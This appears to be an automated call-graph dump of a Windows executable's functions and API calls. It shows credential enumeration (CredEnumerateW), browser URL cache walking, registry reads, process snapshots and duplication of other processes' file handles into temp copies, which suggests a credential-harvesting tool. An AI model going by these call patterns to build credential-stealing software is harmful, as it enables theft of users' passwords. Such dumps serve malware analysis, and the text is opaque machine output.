38205->38206 38206->38204 38208 40aa04 ??3@YAXPAX 38207->38208 38209 40ea88 38208->38209 38210 40aa04 ??3@YAXPAX 38209->38210 38211 40ea90 38210->38211 38212 40aa04 ??3@YAXPAX 38211->38212 38213 40ea98 38212->38213 38214 40aa04 ??3@YAXPAX 38213->38214 38215 40eaa0 38214->38215 38216 40a9ce 4 API calls 38215->38216 38217 40eab3 38216->38217 38218 40a9ce 4 API calls 38217->38218 38219 40eabd 38218->38219 38220 40a9ce 4 API calls 38219->38220 38221 40eac7 38220->38221 38222 40a9ce 4 API calls 38221->38222 38223 40ead1 38222->38223 38223->38196 38224->38156 38225->38160 38283 40b2cc 38226->38283 38228 402b0a 38229 40b2cc 27 API calls 38228->38229 38230 402b23 38229->38230 38231 40b2cc 27 API calls 38230->38231 38232 402b3a 38231->38232 38233 40b2cc 27 API calls 38232->38233 38234 402b54 38233->38234 38235 40b2cc 27 API calls 38234->38235 38236 402b6b 38235->38236 38237 40b2cc 27 API calls 38236->38237 38238 402b82 38237->38238 38239 40b2cc 27 API calls 38238->38239 38240 402b99 38239->38240 38241 40b2cc 27 API calls 38240->38241 38242 402bb0 38241->38242 38243 40b2cc 27 API calls 38242->38243 38244 402bc7 38243->38244 38245 40b2cc 27 API calls 38244->38245 38246 402bde 38245->38246 38247 40b2cc 27 API calls 38246->38247 38248 402bf5 38247->38248 38249 40b2cc 27 API calls 38248->38249 38250 402c0c 38249->38250 38251 40b2cc 27 API calls 38250->38251 38252 402c23 38251->38252 38253 40b2cc 27 API calls 38252->38253 38254 402c3a 38253->38254 38255 40b2cc 27 API calls 38254->38255 38256 402c51 38255->38256 38257 40b2cc 27 API calls 38256->38257 38258 402c68 38257->38258 38259 40b2cc 27 API calls 38258->38259 38260 402c7f 38259->38260 38261 40b2cc 27 API calls 38260->38261 38262 402c99 38261->38262 38263 40b2cc 27 API calls 38262->38263 38264 402cb3 38263->38264 38265 40b2cc 27 API calls 38264->38265 38266 402cd5 38265->38266 38267 40b2cc 27 API calls 38266->38267 38268 402cf0 38267->38268 38269 40b2cc 27 API calls 38268->38269 38270 402d0b 38269->38270 38271 40b2cc 27 API calls 38270->38271 38272 402d26 38271->38272 38273 40b2cc 27 API calls 38272->38273 38274 402d3e 38273->38274 38275 40b2cc 27 API calls 38274->38275 38276 402d59 38275->38276 38277 40b2cc 27 API calls 38276->38277 38278 402d78 38277->38278 38279 40b2cc 27 API calls 38278->38279 38280 402d93 38279->38280 38281 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38280->38281 38281->38164 38282->38154 38286 40b58d 38283->38286 38285 40b2d1 38285->38228 38287 40b5a4 GetModuleHandleW FindResourceW 38286->38287 38288 40b62e 38286->38288 38289 40b5c2 LoadResource 38287->38289 38291 40b5e7 38287->38291 38288->38285 38290 40b5d0 SizeofResource LockResource 38289->38290 38289->38291 38290->38291 38291->38288 38299 40afcf 38291->38299 38293 40b608 memcpy 38302 40b4d3 memcpy 38293->38302 38295 40b61e 38303 40b3c1 18 API calls 38295->38303 38297 40b626 38304 40b04b 38297->38304 38300 40b04b ??3@YAXPAX 38299->38300 38301 40afd7 ??2@YAPAXI 38300->38301 38301->38293 38302->38295 38303->38297 38305 40b051 ??3@YAXPAX 38304->38305 38306 40b05f 38304->38306 38305->38306 38306->38288 38307->38172 38309 4032c4 38308->38309 38310 40b633 ??3@YAXPAX 38309->38310 38311 403316 38310->38311 38330 44553b 38311->38330 38315 403480 38526 40368c 15 API calls 38315->38526 38317 403489 38318 40b633 ??3@YAXPAX 38317->38318 38319 403495 38318->38319 38319->38174 38320 4033a9 memset memcpy 38321 4033ec wcscmp 38320->38321 38322 40333c 38320->38322 38321->38322 38322->38315 38322->38320 38322->38321 38524 4028e7 11 API calls 38322->38524 38525 40f508 6 API calls 38322->38525 38324 403421 _wcsicmp 38324->38322 38327 444a64 FreeLibrary 38326->38327 38328 444a83 38326->38328 38327->38328 38328->38174 38329->38175 38331 445548 38330->38331 38332 445599 38331->38332 38527 40c768 38331->38527 38333 4455a8 memset 38332->38333 38340 4457f2 38332->38340 38610 403988 38333->38610 38344 445854 38340->38344 38712 403e2d memset memset memset memset memset 38340->38712 38341 445672 38621 403fbe memset memset memset memset memset 38341->38621 38342 4458bb memset memset 38348 414c2e 16 API calls 38342->38348 38393 4458aa 38344->38393 38735 403c9c memset memset memset memset memset 38344->38735 38346 44595e memset memset 38353 414c2e 16 API calls 38346->38353 38347 4455e5 38347->38341 38356 44560f 38347->38356 38349 4458f9 38348->38349 38354 40b2cc 27 API calls 38349->38354 38351 445a00 memset memset 38758 414c2e 38351->38758 38352 445b22 38358 445bca 38352->38358 38359 445b38 memset memset memset 38352->38359 38363 44599c 38353->38363 38364 445909 38354->38364 38355 44557a 38390 44558c 38355->38390 38807 41366b FreeLibrary 38355->38807 38367 4087b3 338 API calls 38356->38367 38357 445849 38822 40b1ab ??3@YAXPAX ??3@YAXPAX 38357->38822 38365 445c8b memset memset 38358->38365 38432 445cf0 38358->38432 38368 445bd4 38359->38368 38369 445b98 38359->38369 38372 40b2cc 27 API calls 38363->38372 38373 409d1f 6 API calls 38364->38373 38376 414c2e 16 API calls 38365->38376 38366 44589f 38823 40b1ab ??3@YAXPAX ??3@YAXPAX 38366->38823 38374 445621 38367->38374 38382 414c2e 16 API calls 38368->38382 38369->38368 38378 445ba2 38369->38378 38375 4459ac 38372->38375 38386 445919 38373->38386 38808 4454bf 20 API calls 38374->38808 38388 409d1f 6 API calls 38375->38388 38389 445cc9 38376->38389 38895 4099c6 wcslen 38378->38895 38379 4456b2 38810 40b1ab ??3@YAXPAX ??3@YAXPAX 38379->38810 38381 40b2cc 27 API calls 38394 445a4f 38381->38394 38396 445be2 38382->38396 38383 403335 38523 4452e5 45 API calls 38383->38523 38384 445d3d 38416 40b2cc 27 API calls 38384->38416 38385 445d88 memset memset memset 38399 414c2e 16 API calls 38385->38399 38824 409b98 GetFileAttributesW 38386->38824 38387 445823 38387->38357 38398 4087b3 338 API calls 38387->38398 38400 4459bc 38388->38400 38401 409d1f 6 API calls 38389->38401 38594 444b06 38390->38594 38391 445879 38391->38366 38412 4087b3 338 API calls 38391->38412 38393->38342 38417 44594a 38393->38417 38773 409d1f wcslen wcslen 38394->38773 38405 40b2cc 27 API calls 38396->38405 38398->38387 38409 445dde 38399->38409 38891 409b98 GetFileAttributesW 38400->38891 38411 445ce1 38401->38411 38402 445bb3 38898 445403 memset 38402->38898 38403 445680 38403->38379 38644 4087b3 memset 38403->38644 38406 445bf3 38405->38406 38415 409d1f 6 API calls 38406->38415 38407 445928 38407->38417 38825 40b6ef 38407->38825 38418 40b2cc 27 API calls 38409->38418 38915 409b98 GetFileAttributesW 38411->38915 38412->38391 38426 445c07 38415->38426 38427 445d54 _wcsicmp 38416->38427 38417->38346 38431 4459ed 38417->38431 38430 445def 38418->38430 38419 4459cb 38419->38431 38440 40b6ef 252 API calls 38419->38440 38423 40b2cc 27 API calls 38424 445a94 38423->38424 38778 40ae18 38424->38778 38425 44566d 38425->38340 38695 413d4c 38425->38695 38436 445389 258 API calls 38426->38436 38437 445d71 38427->38437 38502 445d67 38427->38502 38429 445665 38809 40b1ab ??3@YAXPAX ??3@YAXPAX 38429->38809 38438 409d1f 6 API calls 38430->38438 38431->38351 38431->38352 38432->38383 38432->38384 38432->38385 38433 445389 258 API calls 38433->38358 38442 445c17 38436->38442 38916 445093 23 API calls 38437->38916 38445 445e03 38438->38445 38440->38431 38441 4456d8 38447 40b2cc 27 API calls 38441->38447 38448 40b2cc 27 API calls 38442->38448 38444 44563c 38444->38429 38450 4087b3 338 API calls 38444->38450 38917 409b98 GetFileAttributesW 38445->38917 38446 40b6ef 252 API calls 38446->38383 38452 4456e2 38447->38452 38453 445c23 38448->38453 38449 445d83 38449->38383 38450->38444 38811 413fa6 _wcsicmp _wcsicmp 38452->38811 38457 409d1f 6 API calls 38453->38457 38455 445e12 38462 445e6b 38455->38462 38468 40b2cc 27 API calls 38455->38468 38460 445c37 38457->38460 38458 445aa1 38461 445b17 38458->38461 38476 445ab2 memset 38458->38476 38489 409d1f 6 API calls 38458->38489 38785 40add4 38458->38785 38790 445389 38458->38790 38799 40ae51 38458->38799 38459 4456eb 38464 4456fd memset memset memset memset 38459->38464 38465 4457ea 38459->38465 38466 445389 258 API calls 38460->38466 38892 40aebe 38461->38892 38919 445093 23 API calls 38462->38919 38812 409c70 wcscpy wcsrchr 38464->38812 38815 413d29 38465->38815 38471 445c47 38466->38471 38472 445e33 38468->38472 38478 40b2cc 27 API calls 38471->38478 38479 409d1f 6 API calls 38472->38479 38474 445e7e 38475 445f67 38474->38475 38484 40b2cc 27 API calls 38475->38484 38480 40b2cc 27 API calls 38476->38480 38482 445c53 38478->38482 38483 445e47 38479->38483 38480->38458 38481 409c70 2 API calls 38485 44577e 38481->38485 38486 409d1f 6 API calls 38482->38486 38918 409b98 GetFileAttributesW 38483->38918 38488 445f73 38484->38488 38490 409c70 2 API calls 38485->38490 38491 445c67 38486->38491 38493 409d1f 6 API calls 38488->38493 38489->38458 38494 44578d 38490->38494 38495 445389 258 API calls 38491->38495 38492 445e56 38492->38462 38498 445e83 memset 38492->38498 38496 445f87 38493->38496 38494->38465 38501 40b2cc 27 API calls 38494->38501 38495->38358 38922 409b98 GetFileAttributesW 38496->38922 38500 40b2cc 27 API calls 38498->38500 38503 445eab 38500->38503 38504 4457a8 38501->38504 38502->38383 38502->38446 38505 409d1f 6 API calls 38503->38505 38506 409d1f 6 API calls 38504->38506 38507 445ebf 38505->38507 38508 4457b8 38506->38508 38509 40ae18 9 API calls 38507->38509 38814 409b98 GetFileAttributesW 38508->38814 38519 445ef5 38509->38519 38511 4457c7 38511->38465 38513 4087b3 338 API calls 38511->38513 38512 40ae51 9 API calls 38512->38519 38513->38465 38514 445f5c 38516 40aebe FindClose 38514->38516 38515 40add4 2 API calls 38515->38519 38516->38475 38517 40b2cc 27 API calls 38517->38519 38518 409d1f 6 API calls 38518->38519 38519->38512 38519->38514 38519->38515 38519->38517 38519->38518 38521 445f3a 38519->38521 38920 409b98 GetFileAttributesW 38519->38920 38921 445093 23 API calls 38521->38921 38523->38322 38524->38324 38525->38322 38526->38317 38528 40c775 38527->38528 38923 40b1ab ??3@YAXPAX ??3@YAXPAX 38528->38923 38530 40c788 38924 40b1ab ??3@YAXPAX ??3@YAXPAX 38530->38924 38532 40c790 38925 40b1ab ??3@YAXPAX ??3@YAXPAX 38532->38925 38534 40c798 38535 40aa04 ??3@YAXPAX 38534->38535 38536 40c7a0 38535->38536 38926 40c274 memset 38536->38926 38541 40a8ab 9 API calls 38542 40c7c3 38541->38542 38543 40a8ab 9 API calls 38542->38543 38544 40c7d0 38543->38544 38955 40c3c3 38544->38955 38548 40c877 38557 40bdb0 38548->38557 38549 40c86c 38997 4053fe 39 API calls 38549->38997 38551 40c7e5 38551->38548 38551->38549 38556 40c634 49 API calls 38551->38556 38980 40a706 38551->38980 38556->38551 39165 404363 38557->39165 38560 40bf5d 39185 40440c 38560->39185 38562 40bdee 38562->38560 38565 40b2cc 27 API calls 38562->38565 38563 40bddf CredEnumerateW 38563->38562 38566 40be02 wcslen 38565->38566 38566->38560 38568 40be1e 38566->38568 38567 40be26 _wcsncoll 38567->38568 38568->38560 38568->38567 38571 40be7d memset 38568->38571 38572 40bea7 memcpy 38568->38572 38573 40bf11 wcschr 38568->38573 38574 40b2cc 27 API calls 38568->38574 38576 40bf43 LocalFree 38568->38576 39188 40bd5d 28 API calls 38568->39188 39189 404423 38568->39189 38571->38568 38571->38572 38572->38568 38572->38573 38573->38568 38575 40bef6 _wcsnicmp 38574->38575 38575->38568 38575->38573 38576->38568 38577 4135f7 39202 4135e0 38577->39202 38580 40b2cc 27 API calls 38581 41360d 38580->38581 38582 40a804 8 API calls 38581->38582 38583 413613 38582->38583 38584 41361b 38583->38584 38585 41363e 38583->38585 38586 40b273 27 API calls 38584->38586 38587 4135e0 FreeLibrary 38585->38587 38588 413625 GetProcAddress 38586->38588 38589 413643 38587->38589 38588->38585 38590 413648 38588->38590 38589->38355 38591 413658 38590->38591 38592 4135e0 FreeLibrary 38590->38592 38591->38355 38593 413666 38592->38593 38593->38355 39205 4449b9 38594->39205 38597 444c1f 38597->38332 38598 4449b9 42 API calls 38611 40399d 38610->38611 39231 403a16 38611->39231 38613 403a09 39245 40b1ab ??3@YAXPAX ??3@YAXPAX 38613->39245 38615 403a12 wcsrchr 38615->38347 38616 4039a3 38616->38613 38619 4039f4 38616->38619 39242 40a02c CreateFileW 38616->39242 38619->38613 38620 4099c6 2 API calls 38619->38620 38620->38613 38622 414c2e 16 API calls 38621->38622 38623 404048 38622->38623 38624 414c2e 16 API calls 38623->38624 38625 404056 38624->38625 38626 409d1f 6 API calls 38625->38626 38627 404073 38626->38627 38628 409d1f 6 API calls 38627->38628 38629 40408e 38628->38629 38630 409d1f 6 API calls 38629->38630 38631 4040a6 38630->38631 38632 403af5 20 API calls 38631->38632 38633 4040ba 38632->38633 38634 403af5 20 API calls 38633->38634 38635 4040cb 38634->38635 39272 40414f memset 38635->39272 38637 404140 39286 40b1ab ??3@YAXPAX ??3@YAXPAX 38637->39286 38639 4040ec memset 38642 4040e0 38639->38642 38640 404148 38640->38403 38641 4099c6 2 API calls 38641->38642 38642->38637 38642->38639 38642->38641 38643 40a8ab 9 API calls 38642->38643 38643->38642 39299 40a6e6 WideCharToMultiByte 38644->39299 38646 4087ed 39300 4095d9 memset 38646->39300 38649 408953 38649->38403 38650 408809 memset memset memset memset memset 38651 40b2cc 27 API calls 38650->38651 38652 4088a1 38651->38652 38653 409d1f 6 API calls 38652->38653 38654 4088b1 38653->38654 38655 40b2cc 27 API calls 38654->38655 38696 40b633 ??3@YAXPAX 38695->38696 38697 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38696->38697 38698 413f00 Process32NextW 38697->38698 38699 413da5 OpenProcess 38698->38699 38700 413f17 CloseHandle 38698->38700 38701 413df3 memset 38699->38701 38706 413eb0 38699->38706 38700->38441 39589 413f27 38701->39589 38703 413ebf ??3@YAXPAX 38703->38706 38704 4099f4 3 API calls 38704->38706 38706->38698 38706->38703 38706->38704 38707 413e37 GetModuleHandleW 38708 413e1f 38707->38708 38709 413e46 GetProcAddress 38707->38709 38708->38707 39594 413959 38708->39594 39610 413ca4 38708->39610 38709->38708 38711 413ea2 CloseHandle 38711->38706 38713 414c2e 16 API calls 38712->38713 38714 403eb7 38713->38714 38715 414c2e 16 API calls 38714->38715 38716 403ec5 38715->38716 38717 409d1f 6 API calls 38716->38717 38718 403ee2 38717->38718 38719 409d1f 6 API calls 38718->38719 38720 403efd 38719->38720 38721 409d1f 6 API calls 38720->38721 38722 403f15 38721->38722 38723 403af5 20 API calls 38722->38723 38724 403f29 38723->38724 38725 403af5 20 API calls 38724->38725 38726 403f3a 38725->38726 38727 40414f 33 API calls 38726->38727 38728 403f4f 38727->38728 38729 403faf 38728->38729 38731 403f5b memset 38728->38731 38733 4099c6 2 API calls 38728->38733 38734 40a8ab 9 API calls 38728->38734 39624 40b1ab ??3@YAXPAX ??3@YAXPAX 38729->39624 38731->38728 38732 403fb7 38732->38387 38733->38728 38734->38728 38736 414c2e 16 API calls 38735->38736 38737 403d26 38736->38737 38738 414c2e 16 API calls 38737->38738 38739 403d34 38738->38739 38740 409d1f 6 API calls 38739->38740 38741 403d51 38740->38741 38742 409d1f 6 API calls 38741->38742 38743 403d6c 38742->38743 38744 409d1f 6 API calls 38743->38744 38745 403d84 38744->38745 38746 403af5 20 API calls 38745->38746 38747 403d98 38746->38747 38748 403af5 20 API calls 38747->38748 38749 403da9 38748->38749 38750 40414f 33 API calls 38749->38750 38751 403dbe 38750->38751 38752 403e1e 38751->38752 38753 403dca memset 38751->38753 38756 4099c6 2 API calls 38751->38756 38757 40a8ab 9 API calls 38751->38757 39625 40b1ab ??3@YAXPAX ??3@YAXPAX 38752->39625 38753->38751 38755 403e26 38755->38391 38756->38751 38757->38751 38759 414b81 9 API calls 38758->38759 38760 414c40 38759->38760 38761 414c73 memset 38760->38761 39626 409cea 38760->39626 38762 414c94 38761->38762 39629 414592 RegOpenKeyExW 38762->39629 38765 414c64 38765->38381 38767 414cc1 38768 414cf4 wcscpy 38767->38768 39630 414bb0 wcscpy 38767->39630 38768->38765 38770 414cd2 39631 4145ac RegQueryValueExW 38770->39631 38772 414ce9 RegCloseKey 38772->38768 38774 409d62 38773->38774 38775 409d43 wcscpy 38773->38775 38774->38423 38776 409719 2 API calls 38775->38776 38777 409d51 wcscat 38776->38777 38777->38774 38779 40aebe FindClose 38778->38779 38780 40ae21 38779->38780 38781 4099c6 2 API calls 38780->38781 38782 40ae35 38781->38782 38783 409d1f 6 API calls 38782->38783 38784 40ae49 38783->38784 38784->38458 38786 40ade0 38785->38786 38787 40ae0f 38785->38787 38786->38787 38788 40ade7 wcscmp 38786->38788 38787->38458 38788->38787 38789 40adfe wcscmp 38788->38789 38789->38787 38791 40ae18 9 API calls 38790->38791 38797 4453c4 38791->38797 38792 40ae51 9 API calls 38792->38797 38793 4453f3 38795 40aebe FindClose 38793->38795 38794 40add4 2 API calls 38794->38797 38796 4453fe 38795->38796 38796->38458 38797->38792 38797->38793 38797->38794 38798 445403 253 API calls 38797->38798 38798->38797 38800 40ae7b FindNextFileW 38799->38800 38801 40ae5c FindFirstFileW 38799->38801 38802 40ae94 38800->38802 38803 40ae8f 38800->38803 38801->38802 38805 40aeb6 38802->38805 38806 409d1f 6 API calls 38802->38806 38804 40aebe FindClose 38803->38804 38804->38802 38805->38458 38806->38805 38807->38390 38808->38444 38809->38425 38810->38425 38811->38459 38813 409c89 38812->38813 38813->38481 38814->38511 38816 413d39 38815->38816 38817 413d2f FreeLibrary 38815->38817 38818 40b633 ??3@YAXPAX 38816->38818 38817->38816 38819 413d42 38818->38819 38820 40b633 ??3@YAXPAX 38819->38820 38821 413d4a 38820->38821 38821->38340 38822->38344 38823->38393 38824->38407 38826 44db70 38825->38826 38827 40b6fc memset 38826->38827 38828 409c70 2 API calls 38827->38828 38829 40b732 wcsrchr 38828->38829 38830 40b743 38829->38830 38831 40b746 memset 38829->38831 38830->38831 38832 40b2cc 27 API calls 38831->38832 38833 40b76f 38832->38833 38834 409d1f 6 API calls 38833->38834 38835 40b783 38834->38835 39632 409b98 GetFileAttributesW 38835->39632 38837 40b792 38838 40b7c2 38837->38838 38839 409c70 2 API calls 38837->38839 39633 40bb98 38838->39633 38841 40b7a5 38839->38841 38843 40b2cc 27 API calls 38841->38843 38847 40b7b2 38843->38847 38844 40b837 FindCloseChangeNotification 38846 40b83e memset 38844->38846 38845 40b817 39667 409a45 GetTempPathW 38845->39667 39666 40a6e6 WideCharToMultiByte 38846->39666 38850 409d1f 6 API calls 38847->38850 38850->38838 38851 40b827 CopyFileW 38851->38846 38852 40b866 38853 444432 121 API calls 38852->38853 38854 40b879 38853->38854 38855 40bad5 38854->38855 38856 40b273 27 API calls 38854->38856 38857 40baeb 38855->38857 38858 40bade DeleteFileW 38855->38858 38859 40b89a 38856->38859 38860 40b04b ??3@YAXPAX 38857->38860 38858->38857 38861 438552 134 API calls 38859->38861 38862 40baf3 38860->38862 38863 40b8a4 38861->38863 38862->38417 38864 40bacd 38863->38864 38866 4251c4 137 API calls 38863->38866 38865 443d90 111 API calls 38864->38865 38865->38855 38889 40b8b8 38866->38889 38867 40bac6 39679 424f26 123 API calls 38867->39679 38868 40b8bd memset 39670 425413 17 API calls 38868->39670 38871 425413 17 API calls 38871->38889 38874 40a71b MultiByteToWideChar 38874->38889 38875 40a734 MultiByteToWideChar 38875->38889 38878 40b9b5 memcmp 38878->38889 38879 4099c6 2 API calls 38879->38889 38880 404423 37 API calls 38880->38889 38882 40bb3e memset memcpy 39680 40a734 MultiByteToWideChar 38882->39680 38883 4251c4 137 API calls 38883->38889 38886 40bb88 LocalFree 38886->38889 38889->38867 38889->38868 38889->38871 38889->38874 38889->38875 38889->38878 38889->38879 38889->38880 38889->38882 38889->38883 38890 40ba5f memcmp 38889->38890 39671 4253ef 16 API calls 38889->39671 39672 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38889->39672 39673 4253af 17 API calls 38889->39673 39674 4253cf 17 API calls 38889->39674 39675 447280 memset 38889->39675 39676 447960 memset memcpy memcpy memcpy 38889->39676 39677 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38889->39677 39678 447920 memcpy memcpy memcpy 38889->39678 38890->38889 38891->38419 38893 40aed1 38892->38893 38894 40aec7 FindClose 38892->38894 38893->38352 38894->38893 38896 4099d7 38895->38896 38897 4099da memcpy 38895->38897 38896->38897 38897->38402 38899 40b2cc 27 API calls 38898->38899 38900 44543f 38899->38900 38901 409d1f 6 API calls 38900->38901 38902 44544f 38901->38902 39772 409b98 GetFileAttributesW 38902->39772 38904 44545e 38905 445476 38904->38905 38906 40b6ef 252 API calls 38904->38906 38907 40b2cc 27 API calls 38905->38907 38906->38905 38908 445482 38907->38908 38909 409d1f 6 API calls 38908->38909 38910 445492 38909->38910 39773 409b98 GetFileAttributesW 38910->39773 38912 4454a1 38913 4454b9 38912->38913 38914 40b6ef 252 API calls 38912->38914 38913->38433 38914->38913 38915->38432 38916->38449 38917->38455 38918->38492 38919->38474 38920->38519 38921->38519 38922->38502 38923->38530 38924->38532 38925->38534 38927 414c2e 16 API calls 38926->38927 38928 40c2ae 38927->38928 38998 40c1d3 38928->38998 38933 40c3be 38950 40a8ab 38933->38950 38934 40afcf 2 API calls 38935 40c2fd FindFirstUrlCacheEntryW 38934->38935 38936 40c3b6 38935->38936 38937 40c31e wcschr 38935->38937 38938 40b04b ??3@YAXPAX 38936->38938 38939 40c331 38937->38939 38940 40c35e FindNextUrlCacheEntryW 38937->38940 38938->38933 38941 40a8ab 9 API calls 38939->38941 38940->38937 38942 40c373 GetLastError 38940->38942 38945 40c33e wcschr 38941->38945 38943 40c3ad FindCloseUrlCache 38942->38943 38944 40c37e 38942->38944 38943->38936 38946 40afcf 2 API calls 38944->38946 38945->38940 38947 40c34f 38945->38947 38948 40c391 FindNextUrlCacheEntryW 38946->38948 38949 40a8ab 9 API calls 38947->38949 38948->38937 38948->38943 38949->38940 39092 40a97a 38950->39092 38953 40a8cc 38953->38541 38954 40a8d0 7 API calls 38954->38953 39097 40b1ab ??3@YAXPAX ??3@YAXPAX 38955->39097 38957 40c3dd 38958 40b2cc 27 API calls 38957->38958 38959 40c3e7 38958->38959 39098 414592 RegOpenKeyExW 38959->39098 38961 40c3f4 38962 40c50e 38961->38962 38963 40c3ff 38961->38963 38977 405337 38962->38977 38964 40a9ce 4 API calls 38963->38964 38965 40c418 memset 38964->38965 39099 40aa1d 38965->39099 38968 40c471 38970 40c47a _wcsupr 38968->38970 38969 40c505 RegCloseKey 38969->38962 38971 40a8d0 7 API calls 38970->38971 38972 40c498 38971->38972 38973 40a8d0 7 API calls 38972->38973 38974 40c4ac memset 38973->38974 38975 40aa1d 38974->38975 38976 40c4e4 RegEnumValueW 38975->38976 38976->38969 38976->38970 39101 405220 38977->39101 38981 4099c6 2 API calls 38980->38981 38982 40a714 _wcslwr 38981->38982 38983 40c634 38982->38983 39158 405361 38983->39158 38986 40c65c wcslen 39161 4053b6 39 API calls 38986->39161 38987 40c71d wcslen 38987->38551 38989 40c713 39164 4053df 39 API calls 38989->39164 38990 40c677 38990->38989 39162 40538b 39 API calls 38990->39162 38993 40c6a5 38993->38989 38994 40c6a9 memset 38993->38994 38995 40c6d3 38994->38995 39163 40c589 43 API calls 38995->39163 38997->38548 38999 40ae18 9 API calls 38998->38999 39005 40c210 38999->39005 39000 40ae51 9 API calls 39000->39005 39001 40c264 39002 40aebe FindClose 39001->39002 39004 40c26f 39002->39004 39003 40add4 2 API calls 39003->39005 39010 40e5ed memset memset 39004->39010 39005->39000 39005->39001 39005->39003 39006 40c231 _wcsicmp 39005->39006 39007 40c1d3 35 API calls 39005->39007 39006->39005 39008 40c248 39006->39008 39007->39005 39023 40c084 22 API calls 39008->39023 39011 414c2e 16 API calls 39010->39011 39012 40e63f 39011->39012 39013 409d1f 6 API calls 39012->39013 39014 40e658 39013->39014 39024 409b98 GetFileAttributesW 39014->39024 39016 40e667 39017 40e680 39016->39017 39019 409d1f 6 API calls 39016->39019 39025 409b98 GetFileAttributesW 39017->39025 39019->39017 39020 40e68f 39021 40c2d8 39020->39021 39026 40e4b2 39020->39026 39021->38933 39021->38934 39023->39005 39024->39016 39025->39020 39047 40e01e 39026->39047 39028 40e593 39030 40e5b0 39028->39030 39031 40e59c DeleteFileW 39028->39031 39029 40e521 39029->39028 39070 40e175 39029->39070 39032 40b04b ??3@YAXPAX 39030->39032 39031->39030 39033 40e5bb 39032->39033 39035 40e5c4 CloseHandle 39033->39035 39036 40e5cc 39033->39036 39035->39036 39038 40b633 ??3@YAXPAX 39036->39038 39037 40e573 39039 40e584 39037->39039 39040 40e57c FindCloseChangeNotification 39037->39040 39041 40e5db 39038->39041 39091 40b1ab ??3@YAXPAX ??3@YAXPAX 39039->39091 39040->39039 39044 40b633 ??3@YAXPAX 39041->39044 39043 40e540 39043->39037 39090 40e2ab 30 API calls 39043->39090 39045 40e5e3 39044->39045 39045->39021 39048 406214 22 API calls 39047->39048 39049 40e03c 39048->39049 39050 40e16b 39049->39050 39051 40dd85 74 API calls 39049->39051 39050->39029 39052 40e06b 39051->39052 39052->39050 39053 40afcf ??2@YAPAXI ??3@YAXPAX 39052->39053 39054 40e08d OpenProcess 39053->39054 39055 40e0a4 GetCurrentProcess DuplicateHandle 39054->39055 39059 40e152 39054->39059 39056 40e0d0 GetFileSize 39055->39056 39057 40e14a CloseHandle 39055->39057 39060 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39056->39060 39057->39059 39058 40e160 39062 40b04b ??3@YAXPAX 39058->39062 39059->39058 39061 406214 22 API calls 39059->39061 39063 40e0ea 39060->39063 39061->39058 39062->39050 39064 4096dc CreateFileW 39063->39064 39065 40e0f1 CreateFileMappingW 39064->39065 39066 40e140 CloseHandle CloseHandle 39065->39066 39067 40e10b MapViewOfFile 39065->39067 39066->39057 39068 40e13b FindCloseChangeNotification 39067->39068 39069 40e11f WriteFile UnmapViewOfFile 39067->39069 39068->39066 39069->39068 39071 40e18c 39070->39071 39072 406b90 11 API calls 39071->39072 39073 40e19f 39072->39073 39074 40e1a7 memset 39073->39074 39075 40e299 39073->39075 39080 40e1e8 39074->39080 39076 4069a3 ??3@YAXPAX ??3@YAXPAX 39075->39076 39077 40e2a4 39076->39077 39077->39043 39078 406e8f 13 API calls 39078->39080 39079 406b53 SetFilePointerEx ReadFile 39079->39080 39080->39078 39080->39079 39081 40e283 39080->39081 39082 40dd50 _wcsicmp 39080->39082 39086 40742e 8 API calls 39080->39086 39087 40aae3 wcslen wcslen _memicmp 39080->39087 39088 40e244 _snwprintf 39080->39088 39083 40e291 39081->39083 39084 40e288 ??3@YAXPAX 39081->39084 39082->39080 39085 40aa04 ??3@YAXPAX 39083->39085 39084->39083 39085->39075 39086->39080 39087->39080 39089 40a8d0 7 API calls 39088->39089 39089->39080 39090->39043 39091->39028 39094 40a980 39092->39094 39093 40a8bb 39093->38953 39093->38954 39094->39093 39095 40a995 _wcsicmp 39094->39095 39096 40a99c wcscmp 39094->39096 39095->39094 39096->39094 39097->38957 39098->38961 39100 40aa23 RegEnumValueW 39099->39100 39100->38968 39100->38969 39102 405335 39101->39102 39103 40522a 39101->39103 39102->38551 39104 40b2cc 27 API calls 39103->39104 39105 405234 39104->39105 39106 40a804 8 API calls 39105->39106 39107 40523a 39106->39107 39146 40b273 39107->39146 39109 405248 _mbscpy _mbscat GetProcAddress 39110 40b273 27 API calls 39109->39110 39111 405279 39110->39111 39149 405211 GetProcAddress 39111->39149 39113 405282 39114 40b273 27 API calls 39113->39114 39115 40528f 39114->39115 39150 405211 GetProcAddress 39115->39150 39117 405298 39118 40b273 27 API calls 39117->39118 39119 4052a5 39118->39119 39151 405211 GetProcAddress 39119->39151 39121 4052ae 39122 40b273 27 API calls 39121->39122 39123 4052bb 39122->39123 39152 405211 GetProcAddress 39123->39152 39125 4052c4 39126 40b273 27 API calls 39125->39126 39127 4052d1 39126->39127 39153 405211 GetProcAddress 39127->39153 39129 4052da 39147 40b58d 27 API calls 39146->39147 39148 40b18c 39147->39148 39148->39109 39149->39113 39150->39117 39151->39121 39152->39125 39153->39129 39159 405220 39 API calls 39158->39159 39160 405369 39159->39160 39160->38986 39160->38987 39161->38990 39162->38993 39163->38989 39164->38987 39166 40440c FreeLibrary 39165->39166 39167 40436d 39166->39167 39168 40a804 8 API calls 39167->39168 39169 404377 39168->39169 39170 404383 39169->39170 39171 404405 39169->39171 39172 40b273 27 API calls 39170->39172 39171->38560 39171->38562 39171->38563 39173 40438d GetProcAddress 39172->39173 39174 40b273 27 API calls 39173->39174 39175 4043a7 GetProcAddress 39174->39175 39176 40b273 27 API calls 39175->39176 39177 4043ba GetProcAddress 39176->39177 39178 40b273 27 API calls 39177->39178 39179 4043ce GetProcAddress 39178->39179 39180 40b273 27 API calls 39179->39180 39181 4043e2 GetProcAddress 39180->39181 39182 4043f1 39181->39182 39183 4043f7 39182->39183 39184 40440c FreeLibrary 39182->39184 39183->39171 39184->39171 39186 404413 FreeLibrary 39185->39186 39187 40441e 39185->39187 39186->39187 39187->38577 39188->38568 39190 40442e 39189->39190 39191 40447e 39189->39191 39192 40b2cc 27 API calls 39190->39192 39191->38568 39193 404438 39192->39193 39194 40a804 8 API calls 39193->39194 39195 40443e 39194->39195 39196 404445 39195->39196 39197 404467 39195->39197 39198 40b273 27 API calls 39196->39198 39197->39191 39199 404475 FreeLibrary 